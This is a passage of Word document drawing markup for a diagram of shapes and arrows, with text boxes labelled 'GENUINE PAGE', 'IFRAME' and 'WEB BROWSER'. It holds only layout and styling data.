                        <wps:bodyPr horzOverflow="overflow" vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="49610" name="Shape 49610"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="876473" y="949503"/>
                            <a:ext cx="1229146" cy="1031859"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="1229146" h="1031859">
                                <a:moveTo>
                                  <a:pt x="0" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="1229146" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1229146" y="1031859"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="1031859"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="0"/>
                                </a:lnTo>
                              </a:path>
                            </a:pathLst>
                          </a:custGeom>
                          <a:ln w="0" cap="sq">
                            <a:miter lim="127000"/>
                          </a:ln>
                        </wps:spPr>
                        <wps:style>
                          <a:lnRef idx="0">
                            <a:srgbClr val="000000">
                              <a:alpha val="0"/>
                            </a:srgbClr>
                          </a:lnRef>
                          <a:fillRef idx="1">
                            <a:srgbClr val="FF0000"/>
                          </a:fillRef>
                          <a:effectRef idx="0">
                            <a:scrgbClr r="0" g="0" b="0"/>
                          </a:effectRef>
                          <a:fontRef idx="none"/>
                        </wps:style>
                        <wps:bodyPr/>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="1518" name="Shape 1518"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="876473" y="949503"/>
                            <a:ext cx="1229146" cy="1031859"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="1229146" h="1031859">
                                <a:moveTo>
                                  <a:pt x="0" y="1031859"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="1229146" y="1031859"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1229146" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="0"/>
                                </a:lnTo>
                                <a:close/>
                              </a:path>
                            </a:pathLst>
                          </a:custGeom>
                          <a:ln w="2906" cap="sq">
                            <a:miter lim="127000"/>
                          </a:ln>
                        </wps:spPr>
                        <wps:style>
                          <a:lnRef idx="1">
                            <a:srgbClr val="C8C8C8"/>
                          </a:lnRef>
                          <a:fillRef idx="0">
                            <a:srgbClr val="000000">
                              <a:alpha val="0"/>
                            </a:srgbClr>
                          </a:fillRef>
                          <a:effectRef idx="0">
                            <a:scrgbClr r="0" g="0" b="0"/>
                          </a:effectRef>
                          <a:fontRef idx="none"/>
                        </wps:style>
                        <wps:bodyPr/>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="49611" name="Shape 49611"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="903419" y="429209"/>
                            <a:ext cx="1229146" cy="329496"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="1229146" h="329496">
                                <a:moveTo>
                                  <a:pt x="0" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="1229146" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1229146" y="329496"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="329496"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="0"/>
                                </a:lnTo>
                              </a:path>
                            </a:pathLst>
                          </a:custGeom>
                          <a:ln w="0" cap="sq">
                            <a:miter lim="127000"/>
                          </a:ln>
                        </wps:spPr>
                        <wps:style>
                          <a:lnRef idx="0">
                            <a:srgbClr val="000000">
                              <a:alpha val="0"/>
                            </a:srgbClr>
                          </a:lnRef>
                          <a:fillRef idx="1">
                            <a:srgbClr val="4672C4"/>
                          </a:fillRef>
                          <a:effectRef idx="0">
                            <a:scrgbClr r="0" g="0" b="0"/>
                          </a:effectRef>
                          <a:fontRef idx="none"/>
                        </wps:style>
                        <wps:bodyPr/>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="1521" name="Shape 1521"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="903419" y="429209"/>
                            <a:ext cx="1229146" cy="329496"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="1229146" h="329496">
                                <a:moveTo>
                                  <a:pt x="0" y="329496"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="1229146" y="329496"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1229146" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="0"/>
                                </a:lnTo>
                                <a:close/>
                              </a:path>
                            </a:pathLst>
                          </a:custGeom>
                          <a:ln w="2906" cap="sq">
                            <a:miter lim="127000"/>
                          </a:ln>
                        </wps:spPr>
                        <wps:style>
                          <a:lnRef idx="1">
                            <a:srgbClr val="C8C8C8"/>
                          </a:lnRef>
                          <a:fillRef idx="0">
                            <a:srgbClr val="000000">
                              <a:alpha val="0"/>
                            </a:srgbClr>
                          </a:fillRef>
                          <a:effectRef idx="0">
                            <a:scrgbClr r="0" g="0" b="0"/>
                          </a:effectRef>
                          <a:fontRef idx="none"/>
                        </wps:style>
                        <wps:bodyPr/>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="1524" name="Rectangle 1524"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="1201165" y="551113"/>
                            <a:ext cx="840914" cy="126369"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="0F199B7F" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
                              <w:r>
                                <w:rPr>
                                  <w:color w:val="FEFFFF"/>
                                  <w:sz w:val="15"/>
                                </w:rPr>
                                <w:t>GENUINE PAGE</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr horzOverflow="overflow" vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="49612" name="Shape 49612"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="1131758" y="1300690"/>
                            <a:ext cx="718577" cy="329496"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="718577" h="329496">
                                <a:moveTo>
                                  <a:pt x="0" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="718577" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="718577" y="329496"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="329496"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="0"/>
                                </a:lnTo>
                              </a:path>
                            </a:pathLst>
                          </a:custGeom>
                          <a:ln w="0" cap="sq">
                            <a:miter lim="127000"/>
                          </a:ln>
                        </wps:spPr>
                        <wps:style>
                          <a:lnRef idx="0">
                            <a:srgbClr val="000000">
                              <a:alpha val="0"/>
                            </a:srgbClr>
                          </a:lnRef>
                          <a:fillRef idx="1">
                            <a:srgbClr val="FEFFFF"/>
                          </a:fillRef>
                          <a:effectRef idx="0">
                            <a:scrgbClr r="0" g="0" b="0"/>
                          </a:effectRef>
                          <a:fontRef idx="none"/>
                        </wps:style>
                        <wps:bodyPr/>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="1526" name="Shape 1526"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="1131758" y="1300690"/>
                            <a:ext cx="718577" cy="329496"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="718577" h="329496">
                                <a:moveTo>
                                  <a:pt x="0" y="329496"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="718577" y="329496"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="718577" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="0"/>
                                </a:lnTo>
                                <a:close/>
                              </a:path>
                            </a:pathLst>
                          </a:custGeom>
                          <a:ln w="2906" cap="sq">
                            <a:miter lim="127000"/>
                          </a:ln>
                        </wps:spPr>
                        <wps:style>
                          <a:lnRef idx="1">
                            <a:srgbClr val="C8C8C8"/>
                          </a:lnRef>
                          <a:fillRef idx="0">
                            <a:srgbClr val="000000">
                              <a:alpha val="0"/>
                            </a:srgbClr>
                          </a:fillRef>
                          <a:effectRef idx="0">
                            <a:scrgbClr r="0" g="0" b="0"/>
                          </a:effectRef>
                          <a:fontRef idx="none"/>
                        </wps:style>
                        <wps:bodyPr/>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="49613" name="Shape 49613"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="1284439" y="1383058"/>
                            <a:ext cx="413176" cy="164748"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="413176" h="164748">
                                <a:moveTo>
                                  <a:pt x="0" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="413176" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="413176" y="164748"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="164748"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="0"/>
                                </a:lnTo>
                              </a:path>
                            </a:pathLst>
                          </a:custGeom>
                          <a:ln w="0" cap="sq">
                            <a:miter lim="127000"/>
                          </a:ln>
                        </wps:spPr>
                        <wps:style>
                          <a:lnRef idx="0">
                            <a:srgbClr val="000000">
                              <a:alpha val="0"/>
                            </a:srgbClr>
                          </a:lnRef>
                          <a:fillRef idx="1">
                            <a:srgbClr val="4672C4"/>
                          </a:fillRef>
                          <a:effectRef idx="0">
                            <a:scrgbClr r="0" g="0" b="0"/>
                          </a:effectRef>
                          <a:fontRef idx="none"/>
                        </wps:style>
                        <wps:bodyPr/>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="1532" name="Rectangle 1532"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="1329181" y="1424327"/>
                            <a:ext cx="428168" cy="126369"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="129DDEB8" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
                              <w:r>
                                <w:rPr>
                                  <w:color w:val="FEFFFF"/>
                                  <w:sz w:val="15"/>
                                  <w:bdr w:val="single" w:sz="4" w:space="0" w:color="C8C8C8"/>
                                </w:rPr>
                                <w:t>IFRAME</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr horzOverflow="overflow" vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="1533" name="Shape 1533"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="646715" y="2212008"/>
                            <a:ext cx="1742593" cy="0"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="1742593">
                                <a:moveTo>
                                  <a:pt x="0" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="1742593" y="0"/>
                                </a:lnTo>
                              </a:path>
                            </a:pathLst>
                          </a:custGeom>
                          <a:ln w="2790" cap="rnd">
                            <a:round/>
                          </a:ln>
                        </wps:spPr>
                        <wps:style>
                          <a:lnRef idx="1">
                            <a:srgbClr val="000000"/>
                          </a:lnRef>
                          <a:fillRef idx="0">
                            <a:srgbClr val="000000">
                              <a:alpha val="0"/>
                            </a:srgbClr>
                          </a:fillRef>
                          <a:effectRef idx="0">
                            <a:scrgbClr r="0" g="0" b="0"/>
                          </a:effectRef>
                          <a:fontRef idx="none"/>
                        </wps:style>
                        <wps:bodyPr/>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="1534" name="Shape 1534"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="646715" y="235040"/>
                            <a:ext cx="1742593" cy="0"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="1742593">
                                <a:moveTo>
                                  <a:pt x="0" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="1742593" y="0"/>
                                </a:lnTo>
                              </a:path>
                            </a:pathLst>
                          </a:custGeom>
                          <a:ln w="2790" cap="rnd">
                            <a:round/>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646715" y="235040"/>
                            <a:ext cx="0" cy="1976968"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path h="1976968">
                                <a:moveTo>
                                  <a:pt x="0" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="0" y="1976968"/>
                                </a:lnTo>
                              </a:path>
                            </a:pathLst>
                          </a:custGeom>
                          <a:ln w="2790" cap="rnd">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2389308" y="235040"/>
                            <a:ext cx="0" cy="1976968"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path h="1976968">
                                <a:moveTo>
                                  <a:pt x="0" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="0" y="1976968"/>
                                </a:lnTo>
                              </a:path>
                            </a:pathLst>
                          </a:custGeom>
                          <a:ln w="2790" cap="rnd">
                            <a:round/>
                          </a:ln>
                        </wps:spPr>
                        <wps:style>
                          <a:lnRef idx="1">
                            <a:srgbClr val="000000"/>
                          </a:lnRef>
                          <a:fillRef idx="0">
                            <a:srgbClr val="000000">
                              <a:alpha val="0"/>
                            </a:srgbClr>
                          </a:fillRef>
                          <a:effectRef idx="0">
                            <a:scrgbClr r="0" g="0" b="0"/>
                          </a:effectRef>
                          <a:fontRef idx="none"/>
                        </wps:style>
                        <wps:bodyPr/>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="1539" name="Rectangle 1539"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="1138424" y="323731"/>
                            <a:ext cx="849218" cy="125975"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="41CC6262" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
                              <w:r>
                                <w:rPr>
                                  <w:color w:val="4672C4"/>
                                  <w:sz w:val="15"/>
                                </w:rPr>
                                <w:t>WEB BROWSER</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr horzOverflow="overflow" vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="1540" name="Shape 1540"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="1491039" y="971193"/>
                            <a:ext cx="2401509" cy="257939"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="2401509" h="257939">
                                <a:moveTo>
                                  <a:pt x="2401509" y="247128"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="2401509" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="257939"/>
                                </a:lnTo>
                              </a:path>
                            </a:pathLst>
                          </a:custGeom>
                          <a:ln w="11624" cap="rnd">
                            <a:round/>
                          </a:ln>
                        </wps:spPr>
                        <wps:style>
                          <a:lnRef idx="1">
                            <a:srgbClr val="00FEFE"/>
                          </a:lnRef>
                          <a:fillRef idx="0">
                            <a:srgbClr val="000000">
                              <a:alpha val="0"/>
                            </a:srgbClr>
                          </a:fillRef>
                          <a:effectRef idx="0">
                            <a:scrgbClr r="0" g="0" b="0"/>
                          </a:effectRef>
                          <a:fontRef idx="none"/>
                        </wps:style>
                        <wps:bodyPr/>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="1541" name="Shape 1541"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="1446424" y="1218903"/>
                            <a:ext cx="89231" cy="81834"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="89231" h="81834">
                                <a:moveTo>
                                  <a:pt x="0" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="89231" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="44615" y="81834"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="0"/>
                                </a:lnTo>
                                <a:close/>
                              </a:path>
                            </a:pathLst>
                          </a:custGeom>
                          <a:ln w="0" cap="rnd">
                            <a:round/>
                          </a:ln>
                        </wps:spPr>
                        <wps:style>
                          <a:lnRef idx="0">
                            <a:srgbClr val="000000">
                              <a:alpha val="0"/>
                            </a:srgbClr>
                          </a:lnRef>
                          <a:fillRef idx="1">
                            <a:srgbClr val="00FEFE"/>
                          </a:fillRef>
                          <a:effectRef idx="0">
                            <a:scrgbClr r="0" g="0" b="0"/>
                          </a:effectRef>
                          <a:fontRef idx="none"/>
                        </wps:style>
                        <wps:bodyPr/>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="1542" name="Shape 1542"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="1491040" y="1547806"/>
                            <a:ext cx="2401509" cy="247129"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="2401509" h="247129">
                                <a:moveTo>
                                  <a:pt x="0" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="0" y="247129"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2401509" y="247129"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2401509" y="71605"/>
                                </a:lnTo>
                              </a:path>
                            </a:pathLst>
                          </a:custGeom>
                          <a:ln w="11624" cap="rnd">
                            <a:round/>
                          </a:ln>
                        </wps:spPr>
                        <wps:style>
                          <a:lnRef idx="1">
                            <a:srgbClr val="00FEFE"/>
                          </a:lnRef>
                          <a:fillRef idx="0">
                            <a:srgbClr val="000000">
                              <a:alpha val="0"/>
                            </a:srgbClr>
                          </a:fillRef>
                          <a:effectRef idx="0">
                            <a:scrgbClr r="0" g="0" b="0"/>
                          </a:effectRef>
                          <a:fontRef idx="none"/>
                        </wps:style>
                        <wps:bodyPr/>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="1543" name="Shape 1543"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="3847933" y="1547806"/>
                            <a:ext cx="89231" cy="81834"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="89231" h="81834">
                                <a:moveTo>
                                  <a:pt x="44616" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="89231" y="81834"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="81834"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="44616" y="0"/>
                                </a:lnTo>
                                <a:close/>
                              </a:path>
                            </a:pathLst>
                          </a:custGeom>
                          <a:ln w="0" cap="rnd">
                            <a:round/>
                          </a:ln>
                        </wps:spPr>
                        <wps:style>
                          <a:lnRef idx="0">
                            <a:srgbClr val="000000">
                              <a:alpha val="0"/>
                            </a:srgbClr>
                          </a:lnRef>
                          <a:fillRef idx="1">
                            <a:srgbClr val="00FEFE"/>
                          </a:fillRef>
                          <a:effectRef idx="0">
                            <a:scrgbClr r="0" g="0" b="0"/>
                          </a:effectRef>
                          <a:fontRef idx="none"/>
                        </wps:style>
                        <wps:bodyPr/>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="1544" name="Shape 1544"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="1491040" y="1547806"/>
                            <a:ext cx="3233615" cy="580961"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="3233615" h="580961">
                                <a:moveTo>
                                  <a:pt x="3233615" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="3233615" y="580961"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="580961"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="505161"/>
                                </a:lnTo>
                              </a:path>
                            </a:pathLst>
                          </a:custGeom>
                          <a:ln w="11624" cap="rnd">
                            <a:round/>
                          </a:ln>
                        </wps:spPr>
                        <wps:style>
                          <a:lnRef idx="1">
                            <a:srgbClr val="FF0000"/>
                          </a:lnRef>
                          <a:fillRef idx="0">
                            <a:srgbClr val="000000">
                              <a:alpha val="0"/>
                            </a:srgbClr>
                          </a:fillRef>
                          <a:effectRef idx="0">
                            <a:scrgbClr r="0" g="0" b="0"/>
                          </a:effectRef>
                          <a:fontRef idx="none"/>
                        </wps:style>
                        <wps:bodyPr/>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="1545" name="Shape 1545"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="1446424" y="1981362"/>
                            <a:ext cx="89231" cy="81834"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="89231" h="81834">
                                <a:moveTo>
                                  <a:pt x="44615" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="89231" y="81834"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="81834"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="44615"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546" name="Shape 1546"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="1491039" y="776025"/>
                            <a:ext cx="3233615" cy="442297"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="3233615" h="442297">
                                <a:moveTo>
                                  <a:pt x="3233615" y="442297"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="3233615" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="101827"/>
                                </a:lnTo>
                              </a:path>
                            </a:pathLst>
                          </a:custGeom>
                          <a:ln w="11624" cap="rnd">
                            <a:round/>
                          </a:ln>
                        </wps:spPr>
                        <wps:style>
                          <a:lnRef idx="1">
                            <a:srgbClr val="FF0000"/>
                          </a:lnRef>
                          <a:fillRef idx="0">
                            <a:srgbClr val="000000">
                              <a:alpha val="0"/>
                            </a:srgbClr>
                          </a:fillRef>
                          <a:effectRef idx="0">
                            <a:scrgbClr r="0" g="0" b="0"/>
                          </a:effectRef>
                          <a:fontRef idx="none"/>
                        </wps:style>
                        <wps:bodyPr/>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="1547" name="Shape 1547"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="1446424" y="867623"/>
                            <a:ext cx="89231" cy="81834"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="89231" h="81834">
                                <a:moveTo>
                                  <a:pt x="0" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="89231" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="44615" y="81834"/>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548" name="Shape 1548"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="247128"/>
                            <a:ext cx="413176" cy="1977027"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="413176" h="1977027">
                                <a:moveTo>
                                  <a:pt x="0" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="413176" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="413176" y="1977027"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="1977027"/>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549" name="Shape 1549"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="247128"/>
                            <a:ext cx="413176" cy="1977027"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="413176" h="1977027">
                                <a:moveTo>
                                  <a:pt x="0" y="1977027"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="413176" y="1977027"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="413176" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="0"/>
                                </a:lnTo>
                                <a:close/>
                              </a:path>
                            </a:pathLst>
                          </a:custGeom>
                          <a:ln w="2906" cap="sq">
                            <a:miter lim="100000"/>
                          </a:ln>
                        </wps:spPr>
                        <wps:style>
                          <a:lnRef idx="1">
                            <a:srgbClr val="C8C8C8"/>
                          </a:lnRef>
                          <a:fillRef idx="0">
                            <a:srgbClr val="000000">
                              <a:alpha val="0"/>
                            </a:srgbClr>
                          </a:fillRef>
                          <a:effectRef idx="0">
                            <a:scrgbClr r="0" g="0" b="0"/>
                          </a:effectRef>
                          <a:fontRef idx="none"/>
                        </wps:style>
                        <wps:bodyPr/>
                      </wps:wsp>
                      <wps:wsp>
